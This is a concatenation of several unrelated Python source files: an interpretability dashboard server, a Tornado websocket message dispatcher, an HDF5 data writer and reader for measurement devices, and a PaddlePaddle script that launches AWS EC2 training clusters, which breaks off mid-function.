Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
@app.route('/')
def hello():
return "No global list view supported at this time."
@app.route('/<id>')
def explanation_visual(id):
if id in ExplanationDashboard.explanations:
return generate_inline_html(ExplanationDashboard.explanations[id], None)
else:
return "Unknown model id."
@app.route('/<id>/predict', methods=['POST'])
def predict(id):
data = request.get_json(force=True)
if id in ExplanationDashboard.explanations:
return ExplanationDashboard.explanations[id].on_predict(data)
return "Unknown model id."
def __init__(self, explanation, model=None, *, dataset=None,
true_y=None, classes=None, features=None, port=None, use_cdn=True,
datasetX=None, trueY=None, locale=None):
# support legacy kwarg names
if dataset is None and datasetX is not None:
dataset = datasetX
if true_y is None and trueY is not None:
true_y = trueY
self._initialize_js(use_cdn)
predict_url = None
local_url = None
if not ExplanationDashboard.service:
try:
ExplanationDashboard.service = ExplanationDashboard.DashboardService(port)
self._thread = threading.Thread(target=ExplanationDashboard.service.run, daemon=True)
self._thread.start()
except Exception as e:
ExplanationDashboard.service = None
raise e
ExplanationDashboard.service.use_cdn = use_cdn
ExplanationDashboard.model_count += 1
base_url = ExplanationDashboard.service.get_base_url()
if base_url is not None:
predict_url = "{0}/{1}/predict".format(
base_url,
str(ExplanationDashboard.model_count))
local_url = "{0}/{1}".format(
base_url,
str(ExplanationDashboard.model_count))
explanation_input =\
ExplanationDashboardInput(explanation, model, dataset, true_y, classes, features, predict_url, locale)
# Due to auth, predict is only available in separate tab in cloud after login
if ExplanationDashboard.service.env == "local":
explanation_input.enable_predict_url()
html = generate_inline_html(explanation_input, local_url)
if ExplanationDashboard.service.env == "azure":
explanation_input.enable_predict_url()
ExplanationDashboard.explanations[str(ExplanationDashboard.model_count)] = explanation_input
if "DATABRICKS_RUNTIME_VERSION" in os.environ:
_render_databricks(html)
else:
display(HTML(html))
def _initialize_js(self, use_cdn):
if (ExplanationDashboard._dashboard_js is None):
if (use_cdn):
try:
url = 'https://interpret-cdn.azureedge.net/{0}'.format(ExplanationDashboard._cdn_path)
r = requests.get(url)
if not r.ok:
ExplanationDashboard.using_fallback = True
self._load_local_js()
return
r.encoding = "utf-8"
ExplanationDashboard._dashboard_js = r.text
except Exception:
ExplanationDashboard.using_fallback = True
self._load_local_js()
else:
self._load_local_js()
def _load_local_js(self):
script_path = os.path.dirname(os.path.abspath(__file__))
js_path = os.path.join(script_path, "static", "index.js")
with open(js_path, "r", encoding="utf-8") as f:
ExplanationDashboard._dashboard_js = f.read()
def generate_inline_html(explanation_input_object, local_url):
explanation_input = json.dumps(explanation_input_object.dashboard_input)
return ExplanationDashboard.default_template.render(explanation=explanation_input,
main_js=ExplanationDashboard._dashboard_js,
app_id='app_123',
using_fallback=ExplanationDashboard.using_fallback,
local_url=local_url,
has_local_url=local_url is not None)
# NOTE: Code mostly derived from Plotly's databricks render as linked below:
# https://github.com/plotly/plotly.py/blob/01a78d3fdac14848affcd33ddc4f9ec72d475232/packages/python/plotly/plotly/io/_base_renderers.py
def _render_databricks(html): # pragma: no cover
import inspect
if _render_databricks.displayHTML is None:
found = False
for frame in inspect.getouterframes(inspect.currentframe()):
global_names = set(frame.frame.f_globals)
target_names = {DatabricksInterfaceConstants.DISPLAY_HTML,
DatabricksInterfaceConstants.DISPLAY,
DatabricksInterfaceConstants.SPARK}
if target_names.issubset(global_names):
_render_databricks.displayHTML = frame.frame.f_globals[
DatabricksInterfaceConstants.DISPLAY_HTML]
found = True
break
if not found:
msg = "Could not find databrick's displayHTML function"
raise RuntimeError(msg)
_render_databricks.displayHTML(html)
_render_databricks.displayHTML = None
|
base_socketsM.py | import tornado.websocket
import json
import definitions
from multiprocessing import Process
SERVER = definitions.SERVER
class SuperBaseSocket(tornado.websocket.WebSocketHandler):
def open(self, id_sessions, Session):
_id = self.get_argument("id", None, True)
if not _id:
self.current_session = Session()
else:
# Reuse the existing session for this id, or create and register a new one
self.current_session = id_sessions.get('{}'.format(_id))
if self.current_session is None:
self.current_session = Session(_id)
id_sessions['{}'.format(_id)] = self.current_session
def on_message(self, message):
json_string = u'%s' % (message)
message = json.loads(json_string)
self.write_message('Sent')
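# Expected message shape: {"receiver": ..., "algorithm": ..., "method": {<method_name>: <args>}}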
receiver = message['receiver']
algorithm = message['algorithm']
method = message['method']
key = list(method.keys())[0]
if receiver == SERVER:
if algorithm:
translator = \
__import__('algorithms.{}.translator'.format(algorithm)).__dict__['{}'.format(algorithm)].__dict__[
'translator']
mt = Process(target=translator.__dict__[key], args=(self.current_session, method[key]))
mt.start()
#translator.__dict__[key](self.current_session, method[key])
else:
self.__getattribute__(key)(method[key])
else:
self.current_session.__getattribute__('socket_{}'.format(receiver)).send(message)
def on_close(self):
pass
class SocketCFD(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketCFD, self).open(id_sessions, Session)
print('CFD connection open')
def on_close(self):
print('Closing CFD connection')
class SocketModel3D(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketModel3D, self).open(id_sessions, Session)
print('3D connection open')
def on_close(self):
print('Closing 3D connection')
class SocketDesign(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketDesign, self).open(id_sessions, Session)
print('Design connection open')
def on_close(self):
print('Closing Design connection')
class SocketHandler(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketHandler, self).open(id_sessions, Session)
print('Handler connection open')
def on_close(self):
print('Closing Handler connection')
class AlexaSocket(SuperBaseSocket):
def open(self, id_sessions, Session):
super(AlexaSocket, self).open(id_sessions, Session)
print('Alexa connection open')
def on_close(self):
print('Closing Alexa connection') |
distributors.py | import os.path
import h5py
import numpy as np
import multiprocessing
import threading
import queue
import warnings
from . import utils
class Distributor:
"""Base class for Distributors.
A `Distributor` is an object that should receive the input data from a
Device, e.g. a plotter or a file writer. Refer to specific implementations
for more details.
"""
def __init__(self, device=None, **kwargs):
self.device = device
for key, value in kwargs.items():
setattr(self, key, value)
def __call__(self, frame):
if frame is False:
self.stop()
else:
self.distribute(frame)
def distribute(self, frame):
raise NotImplementedError('Required method `distribute` is not implemented in {}'.format(self.__class__.__name__))
def reset(self):
"""Resets the distributor"""
pass
def setup(self):
"""Configures the distributor state"""
pass
def stop(self):
pass
@property
def device(self):
try:
return self._device
except AttributeError:
return None
@device.setter
def device(self, dev):
if self.device is not None:
# Unregister from the previous device
if self.device.initialized:
self.reset()
self.device._Device__distributors.remove(self)
self._device = dev
if self.device is not None:
# Register to the new device
self.device._Device__distributors.append(self)
if self.device.initialized:
self.setup()
class QDistributor(Distributor):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.Q = queue.Queue()
def distribute(self, frame):
self.Q.put(frame)
@property
def data(self):
return utils.concatenate_Q(self.Q)
def flush(self):
utils.flush_Q(self.Q)
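# Minimal usage sketch (assuming `dev` is an initialized Device):
#   qd = QDistributor(device=dev)
#   ... acquisition runs and frames accumulate in qd.Q ...
#   samples = qd.data  # concatenated contents of the queue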
class HDFWriter(Distributor):
""" Implements writing to an HDF 5 file.
Hiearchial Data Format (HDF) 5 is a format suitable for multidimentional
data. The format supports arbritrary metadata tags, and datasets can be
organized in a folder-like structure within a single file.
Fileaccess is restricted to a single writer to maintain file integrity.
A single writer can be be used to write data with multiple devices at the
same time by using different datasets.
HDFWriter supports three different file writing modes, see `start`.
Arguments:
name (`str`): The path to the file to write to.
Note:
Only create a single HDFWriter per file!
Todo:
Properly debug this class. It is quite advanced and has undergone many
changes since the initial implementation...
"""
_timeout = 0.1
def __init__(self, filename=None, **kwargs):
super().__init__(**kwargs)
if filename is None:
filename = 'data' # Default filename
name, ext = os.path.splitext(filename)
if len(ext) < 2: # Either empty or just a dot
ext = '.h5'
filename = name + ext
self.filename = filename
self._file = None
self._group = None
self._devices = []
self._input_Qs = []
self._internal_Q = multiprocessing.Queue()
self._datasets = []
self._manual_dataset = None
self._started = threading.Event()
self._stop_event = threading.Event()
def __call__(self, frame):
# We need to overwrite the default call method since we are handling multiple
# devices in this class, and should not stop because of a single device stopping.
pass
@property
def device(self):
return self._devices
@device.setter
def device(self, device):
if device is not None:
self.add_input(device=device)
def add_input(self, device=None, Q=None):
"""Adds a new device or queue.
At least one of ``device`` or ``Q`` must be given. If ``device`` is
``None`` or a string the queue will be treated as a deviceless queue.
If ``Q`` is not given it will be created and registered to the device.
Arguments:
device: A device which reads data.
Q: A queue with data to write.
"""
if device is None and Q is None:
raise ValueError('Either `device` or `Q` must be given as input')
if Q is None:
distr = QDistributor(device=device)
Q = distr.Q
self._devices.append(device)
self._input_Qs.append(Q)
def setup(self):
super().setup()
if not self._started.is_set():
warnings.warn('HDFWriter started automatically! This will NOT work when using multiple devices.')
self.start()
def start(self, mode='auto', use_process=True):
"""Starts the file writer.
The file writer will be started in one of three modes with different
levels of user control.
Mode: ``'auto'``
Data from the input queues is written to file continuously as it arrives.
Mode: ``'signal'``
Data is buffered in the input queues and written each time the writer is signalled via `write`.
Mode: ``'manual'``
Nothing is written automatically; the user calls `write` explicitly with data or a queue.
Arguments:
mode (`str`): The mode to start in.
use_process (`bool`): If writing should be managed in a separate
process. This is recommended, and enabled by default, since
file access with `h5py` will block all other threads. If set
to false, file writing will instead be managed in a thread.
"""
self.mode = mode
if use_process:
self._process = multiprocessing.Process(target=self._write_target)
else:
self._process = threading.Thread(target=self._write_target)
self._process.start()
if mode == 'auto':
self._thread = threading.Thread(target=self._auto_target)
self._thread.start()
elif mode == 'signal':
self._write_signal = threading.Event()
self._thread = threading.Thread(target=self._signal_target)
self._thread.start()
elif mode == 'manual':
class Dummy_thread:
def join():
return True
self._thread = Dummy_thread
self._started.set()
def stop(self):
self._stop_event.set()
self._thread.join()
self.write_device_configs()
self._internal_Q.put(None)
self._stop_event.clear()
def select_group(self, **kwargs):
self._internal_Q.put(('select', kwargs))
def _select_group(self, group=None):
if group is None:
group = '/'
self._group = self._file.require_group(group)
def create_dataset(self, **kwargs):
self._internal_Q.put(('create', kwargs))
def _create_dataset(self, name=None, ndim=2, index=None, **kwargs):
if name is None:
name = 'data{}'.format(index).replace('None', '') # Default name for sets
if name in self._group:
name_idx = 0
while name + '_' + str(name_idx) in self._group:
name_idx += 1
name = name + '_' + str(name_idx)
kwargs.setdefault('shape', ndim * (1,))
kwargs.setdefault('maxshape', ndim * (None,))
kwargs.setdefault('dtype', 'float64')
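# Each tracked dataset is a triple: [h5py dataset, write head (current per-axis indices), last written data shape]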
dataset = [self._group.create_dataset(name=name, **kwargs), np.array(ndim * (0,)), None]
if index is None:
self._manual_dataset = dataset
elif len(self._datasets) > index:
self._datasets[index] = dataset
else:
skips = index - len(self._datasets)
self._datasets.extend(skips * [None])
self._datasets.append(dataset)
return dataset
def write(self, **kwargs):
"""
Todo:
- Debug the ``step`` keyword. We want it to work both for True/False
in both manual writes and signal mode, as well as with an index
or a list of indices for the signalled mode.
- Allow for manual writes regardless of the mode. If the write function
is called with some data or a Q, write that data to the manual dataset.
"""
if self.mode == 'auto':
pass
elif self.mode == 'signal':
if 'step' in kwargs:
for idx in range(len(self._input_Qs)):
self.step(axis=kwargs['step'], index=idx)
self._write_signal.set()
elif self.mode == 'manual':
idx = kwargs.pop('index', None)
if 'name' in kwargs:
create_args = kwargs.copy()
[create_args.pop(key, None) for key in ['Q', 'data', 'step']]
self.create_dataset(**create_args)  # unpack as keyword arguments; create_dataset only accepts **kwargs
if 'Q' in kwargs:
while True:
try:
self._internal_Q.put(('write', (kwargs['Q'].get(timeout=self._timeout), idx)))
except queue.Empty:
break
elif 'data' in kwargs:
self._internal_Q.put(('write', (kwargs['data'], idx)))
if 'step' in kwargs:
self.step(axis=kwargs['step'])
def _write_attrs(self, index=None, **kwargs):
if index is None:
attrs = self._group.attrs
else:
attrs = self._datasets[index][0].attrs
for key, value in kwargs.items():
attrs[key] = value
def write_attrs(self, **kwargs):
self._internal_Q.put(('attrs', kwargs))
def write_device_configs(self, index=None, *args, **kwargs):
if index is None:
for idx in range(len(self._devices)):
self.write_device_configs(index=idx, *args, **kwargs)
else:
attr_names = {'fs', 'label', 'name', 'serial_number'}
device = self._devices[index]
# Qs without devices will correspond to None here, so attrs will be an empty dict => only kwargs will be written
attrs = {}
for attr in attr_names.union(args):
try:
value = getattr(device, attr)
except AttributeError:
pass
else:
attrs[attr] = value
try:
inputs = device.inputs
except AttributeError:
pass
else:
attrs['input_channels'] = np.string_([ch.to_json() for ch in inputs])
try:
outputs = device.outputs
except AttributeError:
pass
else:
attrs['output_channels'] = np.string_([ch.to_json() for ch in outputs])
attrs.update(kwargs)
self.write_attrs(index=index, **attrs)
def _write(self, data, index=None):
if index is None:
# Not an automated write from device Q
try:
dataset, head, _ = self._manual_dataset
except TypeError:
# We get `TypeError` if `_manual_dataset` is `None`
dataset, head, _ = self._create_dataset(ndim=data.ndim, chunks=data.shape)
self._manual_dataset[2] = data.shape
else:
try:
dataset, head, _ = self._datasets[index]
except (IndexError, TypeError):
# We will get an IndexError if index indicated a higher numbered dataset than what already exists,
# but if we have a sparse creation of sets, e.g. set 0 is missing, but set 1 exists, we will get
# a TypeError since `None` is not iterable
dataset, head, _ = self._create_dataset(ndim=data.ndim, chunks=data.shape, index=index)
self._datasets[index][2] = data.shape
for idx in range(data.ndim):
ax = head.size - data.ndim + idx
if head[ax] + data.shape[idx] > dataset.shape[ax]:
dataset.resize(head[ax] + data.shape[idx], axis=ax)
# All indices except the last ndim number are constant
idx_list = list(head[:-data.ndim])
# The last indices should be sliced from head to head+data.shape
idx_list.extend([slice(start, start + length) for start, length in zip(head[-data.ndim:], data.shape)])
# The list must be converted to a tuple
dataset[tuple(idx_list)] = data
# Update the head
head[-1] += data.shape[-1]
def step(self, **kwargs):
self._internal_Q.put(('step', kwargs))
def _step(self, axis=True, index=None):
"""
Todo:
Give a warning if someone tries to step a non-existing dataset
"""
if index is None:
try:
dataset, head, data_shape = self._manual_dataset
except TypeError:
# This happens if someone tries to step before datasets are created
return
else:
try:
dataset, head, data_shape = self._datasets[index]
except TypeError:
# TypeError if someone tries to step before datasets are created
return
if isinstance(axis, bool):
axis = max(len(head) - len(data_shape) - 1, 0)
if axis < 0:
axis = len(head) + axis - 1
steps = (len(head) - len(data_shape)) * (1,) + data_shape
head[axis] += steps[axis]
head[axis + 1:] = 0
if axis < len(head) - len(data_shape) and head[axis] >= dataset.shape[axis]:
dataset.resize(head[axis] + 1, axis)
return
# Old implementation below
if isinstance(axis, bool):
# Leave the data dimensions intact, step along the next one
axis = -len(data_shape) - 1
if axis >= 0:
# We would like to always index from the rear since the dimensions align there
axis = axis - dataset.ndim
if -axis <= len(data_shape):
# Step along axis in data
# Reshaping as a consequence of this cannot be done here since we allow a new data shape
head[axis] += data_shape[axis]
else:
# Step along axis not existing in data, resize if we need to
head[axis] += 1
if head[axis] >= dataset.shape[axis]:
dataset.resize(head[axis] + 1, dataset.ndim + axis)
# Reset axes after step axis
# Strange indexing needed for when axis=-1, since there is no -0 equivalent
head[head.size + axis + 1:] = 0
# self.head = head
def _write_target(self):
def handle(item):
if item is None:
raise StopIteration
else:
action = item[0]
args = item[1]
if action == 'write':
self._write(*args)
elif action == 'create':
self._create_dataset(**args)
elif action == 'step':
self._step(**args)
elif action == 'select':
self._select_group(**args)
elif action == 'attrs':
self._write_attrs(**args)
self._file = h5py.File(self.filename, mode='a')
self._select_group()
# Main write loop
while True:
try:
handle(self._internal_Q.get(timeout=self._timeout))
except queue.Empty:
continue
except StopIteration:
break
self._file.close()
def _auto_target(self):
for idx, device in enumerate(self._devices):
name = getattr(device, 'label', getattr(device, 'name', 'data{}'.format(idx)))
self.create_dataset(name=name, ndim=2, index=idx)
while not self._stop_event.is_set():
for idx, Q in enumerate(self._input_Qs):
try:
data = Q.get(timeout=self._timeout)
except queue.Empty:
continue
self._internal_Q.put(('write', (data, idx)))
# Stop event has been set, clear out any remaining items in the Qs
for idx, Q in enumerate(self._input_Qs):
while True:
try:
data = Q.get(timeout=self._timeout)
except queue.Empty:
break
self._internal_Q.put(('write', (data, idx)))
def _signal_target(self):
for idx, device in enumerate(self._devices):
name = getattr(device, 'label', getattr(device, 'name', 'data{}'.format(idx)))
self.create_dataset(name=name, ndim=3, index=idx)
while not self._stop_event.is_set():
if self._write_signal.wait(self._timeout):
self._write_signal.clear()
for Q in self._input_Qs:
# We should acquire all the locks as fast as possible!
Q.mutex.acquire()
for idx, Q in enumerate(self._input_Qs):
for data in Q.queue:
self._internal_Q.put(('write', (data, idx)))
Q.queue.clear()
for Q in self._input_Qs:
Q.mutex.release()
class HDFReader:
""" Implements reading from HDF 5 files"""
def __init__(self, filename):
if not os.path.isfile(filename):
raise IOError('No such file: {}'.format(filename))
self.file = h5py.File(filename, mode='r')
self.datasets = []
for dataset in self.file:
self.datasets.append(dataset)
self.dataset = self.datasets[0]
def __del__(self):
self.close()
def close(self):
if self.file.id:
self.file.close()
@property
def shape(self):
return self.dataset.shape
@property
def dataset(self):
return self._dataset
@dataset.setter
def dataset(self, dataset):
if dataset not in self.datasets:
if isinstance(dataset, int):
dataset = self.datasets[dataset]
else:
raise KeyError(dataset)
self._dataset = self.file[dataset]
def blocks(self, start=None, stop=None, blocksize=None):
""" A block generator. The last block might be of a different shape than the rest."""
if start is None:
start = 0
if stop is None:
stop = self.shape[1]
if start < 0:
start = self.shape[1] + start
if stop < 0:
stop = self.shape[1] + stop
if blocksize is None:
blocksize = self.dataset.chunks[1]
n_blocks = -((start - stop) // blocksize) # Round up
for block in range(n_blocks):
yield self[:, start + block * blocksize:min(start + (block + 1) * blocksize, stop)]
def __getitem__(self, key):
if len(key) > self.dataset.ndim:
self.dataset = key[-1]
return self.dataset[key[:-1]]
else:
return self.dataset[key]
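# Minimal usage sketch (assuming 'data.h5' was produced by HDFWriter; `process` is a placeholder):
#   reader = HDFReader('data.h5')
#   for block in reader.blocks(blocksize=1024):
#       process(block)
#   reader.close()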
|
cluster_master.py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import json
import math
import time
import threading
import logging
import copy
import csv
import netaddr
import boto3
import namesgenerator
import paramiko
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# You must have aws_access_key_id, aws_secret_access_key, region set in
# ~/.aws/credentials and ~/.aws/config
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--key_name', type=str, default="", help="required, key pair name")
parser.add_argument(
'--security_group_id',
type=str,
default="",
help="required, the security group id associated with your VPC")
parser.add_argument(
'--vpc_id',
type=str,
default="",
help="The VPC in which you wish to run test")
parser.add_argument(
'--subnet_id',
type=str,
default="",
help="The Subnet_id in which you wish to run test")
parser.add_argument(
'--pserver_instance_type',
type=str,
default="c5.2xlarge",
help="your pserver instance type, c5.2xlarge by default")
parser.add_argument(
'--trainer_instance_type',
type=str,
default="p2.8xlarge",
help="your trainer instance type, p2.8xlarge by default")
parser.add_argument(
'--task_name',
type=str,
default="",
help="the name you want to identify your job")
parser.add_argument(
'--pserver_image_id',
type=str,
default="ami-da2c1cbf",
help="ami id for system image, default one has nvidia-docker ready, use ami-1ae93962 for us-east-2"
)
parser.add_argument(
'--trainer_image_id',
type=str,
default="ami-da2c1cbf",
help="ami id for system image, default one has nvidia-docker ready, use ami-1ae93962 for us-west-2"
)
parser.add_argument(
'--availability_zone',
type=str,
default="us-east-2a",
help="aws zone id to place ec2 instances")
parser.add_argument(
'--trainer_count', type=int, default=1, help="Trainer count")
parser.add_argument(
'--pserver_count', type=int, default=1, help="Pserver count")
parser.add_argument(
'--pserver_bash_file',
type=str,
default=os.path.join(os.path.dirname(__file__), "pserver.sh.template"),
help="pserver bash file path")
parser.add_argument(
'--pserver_command', type=str, default="", help="pserver start command")
parser.add_argument(
'--trainer_bash_file',
type=str,
default=os.path.join(os.path.dirname(__file__), "trainer.sh.template"),
help="trainer bash file path")
parser.add_argument(
'--trainer_command', type=str, default="", help="trainer start command")
parser.add_argument(
'--action', type=str, default="serve", help="create|cleanup|serve")
parser.add_argument('--pem_path', type=str, help="private key file")
parser.add_argument(
'--pserver_port', type=str, default="5436", help="pserver port")
parser.add_argument(
'--docker_image', type=str, default="busybox", help="training docker image")
parser.add_argument(
'--master_server_port', type=int, default=5436, help="master server port")
parser.add_argument(
'--master_server_ip', type=str, default="", help="master server private ip")
parser.add_argument(
'--metric_data_identifier',
type=str,
default="**metrics_data: ",
help="key string to identify metrics data")
parser.add_argument(
'--no_clean_up',
type=str2bool,
default=False,
help="whether to clean up after training")
args = parser.parse_args()
ec2client = boto3.client('ec2')
args.log_path = os.path.join(os.path.dirname(__file__), "logs/")
logging.basicConfig(
filename=args.log_path + 'master.log',
level=logging.INFO,
format='%(asctime)s %(message)s')
log_files = ["master.log"]
metrics = {}
metrics_csv_file_name = "metrics.csv"
is_metrics_file_created = False
def create_subnet():
# if no vpc id provided, list vpcs
logging.info("start creating subnet")
if not args.vpc_id:
logging.info("no vpc provided, trying to find the default one")
vpcs_desc = ec2client.describe_vpcs(
Filters=[{
"Name": "isDefault",
"Values": ["true", ]
}], )
if len(vpcs_desc["Vpcs"]) == 0:
raise ValueError('No default VPC')
args.vpc_id = vpcs_desc["Vpcs"][0]["VpcId"]
vpc_cidrBlock = vpcs_desc["Vpcs"][0]["CidrBlock"]
logging.info("default vpc fount with id %s and CidrBlock %s" %
(args.vpc_id, vpc_cidrBlock))
if not vpc_cidrBlock:
logging.info("trying to find cidrblock for vpc")
vpcs_desc = ec2client.describe_vpcs(
Filters=[{
"Name": "vpc-id",
"Values": [args.vpc_id, ],
}], )
if len(vpcs_desc["Vpcs"]) == 0:
raise ValueError('No VPC found')
vpc_cidrBlock = vpcs_desc["Vpcs"][0]["CidrBlock"]
logging.info("cidrblock for vpc is %s" % vpc_cidrBlock)
# list subnets in vpc in order to create a new one
logging.info("trying to find ip blocks for new subnet")
subnets_desc = ec2client.describe_subnets(
Filters=[{
"Name": "vpc-id",
"Values": [args.vpc_id, ],
}], )
ips_taken = []
for subnet_dec in subnets_desc["Subnets"]:
ips_taken.append(subnet_dec["CidrBlock"])
ip_blocks_available = netaddr.IPSet(
[vpc_cidrBlock]) ^ netaddr.IPSet(ips_taken)
# adding 10 addresses as buffer
cidr_prefix = 32 - math.ceil(
math.log(args.pserver_count + args.trainer_count + 10, 2))
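# e.g. 1 pserver + 1 trainer + 10 buffer -> ceil(log2(12)) = 4 host bits -> a /28 subnet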
if cidr_prefix <= 16:
raise ValueError('Too many nodes to fit in current VPC')
subnet_cidr = None  # guard against NameError below if no suitable block is found
for ipnetwork in ip_blocks_available.iter_cidrs():
try:
subnet_cidr = ipnetwork.subnet(int(cidr_prefix)).next()
logging.info("subnet ip block found %s" % (subnet_cidr))
break
except Exception:
pass
if not subnet_cidr:
raise ValueError(
'No available subnet to fit required nodes in current VPC')
logging.info("trying to create subnet")
subnet_desc = ec2client.create_subnet(
CidrBlock=str(subnet_cidr),
VpcId=args.vpc_id,
AvailabilityZone=args.availability_zone)
subnet_id = subnet_desc["Subnet"]["SubnetId"]
subnet_waiter = ec2client.get_waiter('subnet_available')
# sleep for 1s before checking its state
time.sleep(1)
subnet_waiter.wait(SubnetIds=[subnet_id, ])
logging.info("subnet created")
logging.info("adding tags to newly created subnet")
ec2client.create_tags(
Resources=[subnet_id, ],
Tags=[{
"Key": "Task_name",
'Value': args.task_name
}])
return subnet_id
def generate_task_name():
return namesgenerator.get_random_name()
def script_to_str(file_path):
if not file_path:
return "echo $PSERVER_HOSTS"
file = open(file_path, 'r')
text = file.read().strip()
file.close()
return text
def run_instances(image_id, instance_type, count, role, cmd=""):
if count == 0:
return []
response = ec2client.run_instances(
ImageId=image_id,
InstanceType=instance_type,
MaxCount=count,
MinCount=count,
UserData=cmd,
DryRun=False,
InstanceInitiatedShutdownBehavior="stop",
KeyName=args.key_name,
Placement={'AvailabilityZone': args.availability_zone},
NetworkInterfaces=[{
'DeviceIndex': 0,
'SubnetId': args.subnet_id,
"AssociatePublicIpAddress": True,
'Groups': args.security_group_ids
}],
TagSpecifications=[{
'ResourceType': "instance",
'Tags': [{
"Key": 'Task_name',
"Value": args.task_name
}, {
"Key": 'Role',
"Value": role
}]
}])
instance_ids = []
for instance in response["Instances"]:
instance_ids.append(instance["InstanceId"])
if len(instance_ids) > 0:
logging.info(str(len(instance_ids)) + " instance(s) created")
else:
logging.info("no instance created")
#create waiter to make sure it's running
logging.info("waiting for instance to become accessible")
waiter = ec2client.get_waiter('instance_status_ok')
waiter.wait(
Filters=[{
"Name": "instance-status.status",
"Values": ["ok"]
}, {
"Name": "instance-status.reachability",
"Values": ["passed"]
}, {
"Name": "instance-state-name",
"Values": ["running"]
}],
InstanceIds=instance_ids)
instances_response = ec2client.describe_instances(InstanceIds=instance_ids)
return instances_response["Reservations"][0]["Instances"]
def create_pservers():
try:
return run_instances(
image_id=args.pserver_image_id,
instance_type=args.pserver_instance_type,
count=args.pserver_count,
role="PSERVER", )
except Exception:
logging.exception("error while trying to create pservers")
cleanup(args.task_name)
def save_metrics_data(str_msg):
#parse msg
logging.info("found metrics data, saving it to csv file")
global is_metrics_file_created
metrics_raw = str_msg.split(",")
with open(args.log_path + metrics_csv_file_name, 'a') as csvfile:
csv_fieldnames = []
csv_write_data = {}
for metric in metrics_raw:
metric_data = metric.split("=")
metric_key = metric_data[0].strip()
metric_val = float(metric_data[1].strip())
if metric_key not in metrics:
metrics[metric_key] = []
metric_repo = metrics[metric_key]
metric_repo.append(metric_val)
csv_fieldnames.append(metric_key)
csv_write_data[metric_key] = metric_val
writer = csv.DictWriter(csvfile, fieldnames=csv_fieldnames)
if not is_metrics_file_created:
writer.writeheader()
is_metrics_file_created = True
writer.writerow(csv_write_data)
logging.info("csv file appended")
def log_to_file(source, filename):
if filename not in log_files:
log_files.append(filename)
with open(args.log_path + filename, "a") as log_file:
for line in iter(source.readline, ""):
log_file.write(line)
if (line.startswith(args.metric_data_identifier)):
#found key data, trying to add to csv
line = line.replace(args.metric_data_identifier, "")
save_metrics_data(line)
def parse_command(command_raw, defaults={}):
if not command_raw:
command_raw = ""
commands_processed = []
parameter_map = copy.copy(defaults)
for seg in command_raw.split(","):
if ":" in seg:
parameters = seg.split(":")
parameter_map[parameters[0]] = parameters[1]
else:
commands_processed.append(seg)
for key, val in parameter_map.iteritems():
commands_processed.append("--" + key + " " + str(val))
return " ".join(commands_processed)
def create_trainers(kickoff_cmd, pserver_endpoints_str):
def create_and_start_trainer(trainer_index):
logging.info("trainer " + str(trainer_index) + " is starting")
instance_response = run_instances(
image_id=args.trainer_image_id,
instance_type=args.trainer_instance_type,
count=1,
role="TRAINER", )[0]
trainer_ip = instance_response["PrivateIpAddress"]
logging.info("trainer " + str(trainer_index) + " started")
ssh_key = paramiko.RSAKey.from_private_key_file(args.pem_path)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=trainer_ip, username="ubuntu", pkey=ssh_key)
logging.info("trainer " + str(trainer_index) +
" terminal connected via ssh")
cmd = kickoff_cmd.format(
PSERVER_HOSTS=pserver_endpoints_str,
DOCKER_IMAGE=args.docker_image,
TRAINER_INDEX=str(trainer_index),
TASK_NAME=args.task_name,
TRAINER_COUNT=args.trainer_count,
COMMAND=parse_command(args.trainer_command, {"device": "GPU"}),
MASTER_ENDPOINT=args.master_server_ip + ":" +
str(args.master_server_port))
logging.info(cmd)
stdin, stdout, stderr = ssh_client.exec_command(command=cmd)
# read and save output log
logging.info("trainer " + str(trainer_index) +
" command executed, keep fetching log")
stdout_thread = threading.Thread(
target=log_to_file,
args=(
stdout,
"trainer_" + str(trainer_index) + ".log", ))
stderr_thread = threading.Thread(
target=log_to_file,
args=(
stderr,
"trainer_" + str(trainer_index) + "_err.log", ))
stdout_thread.start()
stderr_thread.start()
stdout_thread.join()
stderr_thread.join()
return_code = stdout.channel.recv_exit_status()
if return_code != 0:
trainer_create_results[trainer_index] = {'has_error': True}
raise ValueError("trainer didn't finish with exit code 0")
ssh_client.close()
# multi thread starting trainer instance and run kickoff command
trainer_threads = []
trainer_create_results = {}
try:
for i in xrange(args.trainer_count):
logging.info("starting tread for trainer " + str(i))
trainer_thread = threading.Thread(
target=create_and_start_trainer, args=(i, ))
trainer_thread.start()
trainer_threads.append(trainer_thread)
for trainer_thread in trainer_threads:
trainer_thread.join()
for result in trainer_create_results.values():
if result["has_error"]:
logging.error(
"error during trainer starting or training, destroying the whole cluster "
)
cleanup(args.task_name)
break
logging.info("all trainers stopped")
except Exception:
logging.exception(
"Training exception, clean up resources, please check log for more info"
)
finally:
cleanup(args.task_name)
def cleanup(task_name):
if args.no_clean_up:
logging.info("no clean up option set, going to leave the setup running")
return
#shutdown all ec2 instances
print("going to clean up " + task_name + " instances")
instances_response = ec2client.describe_instances(Filters=[{
"Name": "tag:Task_name",
"Values": [task_name]
}])
instance_ids = []
if len(instances_response["Reservations"]) > 0:
for reservation in instances_response["Reservations"]:
for instance in reservation["Instances"]:
instance_ids.append(instance["InstanceId"])
ec2client.terminate_instances(InstanceIds=instance_ids)
instance_termination_waiter = ec2client.get_waiter(
'instance_terminated')
instance_termination_waiter.wait(InstanceIds=instance_ids)
#delete the subnet created
